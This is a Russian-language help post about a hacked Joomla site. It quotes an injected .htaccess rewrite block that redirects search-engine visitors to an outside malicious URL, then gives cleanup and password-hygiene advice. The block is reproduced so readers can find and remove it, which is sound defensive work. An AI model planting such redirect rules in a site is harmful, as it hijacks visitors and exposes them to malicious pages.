Значить ситуация такая.
Когда администратор или пользователь заходит в админ панель на Joomle, когда пытается создать или редактировать пользователя , то его сразу переадресовывает на како-то сайт. В моей ситуации это был : http://10sp.co.cc/fra/show.php
Переадресация может быть и когда посетитель заходит на сайт.
Как решить проблему?
Найдите все файлы .htaccess и внимательно посмотрите в него, если вы увидете подобное то удаляйте это все!
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://10sp.co.cc/fra/show.php [R=301,L]
Это значит что все пришедшие посетители с поисковых систем перенаправляются на другой сайт. В нашем случае это : http://10sp.co.cc/fra/show.php
Удалите немедлено это со всех файлов .htaccess или в обще удалите эти файлы если там нет ничего что относится к сайту.
Обязательно ищите эти файлы не только в /public_html/
а и в самом корне ./ учетной записи, там тоже могут быть файлы .htaccess и в папках .htaccess/.htaccess
Обязательно их проверьте!
Ка могли сайт взломать ?
Очень просто! В большей вероятности у вас украли пароли к FTP
Что нужно сразу сделать ?
1. Установить антивирус программу, если вы не имеете еe. Если у вас уже установлен антивирус то обновите антивирусные базы. Также не все антивирусы эффективны, проверяйте компьютер несколькими антивирусными программами. Например имея установленный один антивирус, вы можете скачать с сайта http://www.freedrweb.com/ бесплатную утилиту Dr.Web CureIt! и проверить им.
Также хорошо иметь Firewall и Spyware защиту. Например ZoneAlarm, которая включает в себе эти две возможности. А так же эти возможности имеют и другие программы, например Agnitum Outpost Firewall ....
2. Немедленно сменить пароль на фтп (FTP) и к панели управления
3. Немедленно сменить пароли на подключения к базе, почтовым ящикам, а также, логины и пароли, которые хранились в конфигурационных файлах (хакер мог их уже посмотреть).
4. Периодически выполнять смену паролей доступа к FTP
Что нужно делать, чтобы максимально обезопасить себя от вирусов на сайтах и вломов сайта?
1. Ставьте антивирусы и Фаирволы!!! Они помогают. Не всегда, но помогают.
2. Используйте альтернативные браузеры последних версий (Opera, Firefox). Забудьте о Internet Explorer. 90 процентов вирусов-троянов загружаемых через интернет используют уязвимости именно этого браузера. У Firefox (http://www.mozilla.org/) этих самых уязвимостей на два порядка меньше.
3. Не сохраняйте пароли в фтп-клиентах. Они уязвимы и своровать оттуда пароль очень легко.
4. Регулярно поглядывайте на сайт и проверяйте файлы своего сайта.
И в заключении, бывает что с вашим компьютером все в порядке и он не содержит вирусов и шпионов но это не гарантирует сохранности паролей. Некоторые трояны имеют функции "сниффера" (Сниффер - программа для перехвата и анализа сетевого трафика) и находясь на каком-то другом компьютере в вашей подсети вполне могут, путем анализа траффика подсети, заполучить ваш пароль. Тем более что пароли FTP не шифруются. То есть для гарантии сохранности паролей необходим полный комплекс защитных мер для всей сети в целом а не только для одного лишь вашего компьютера.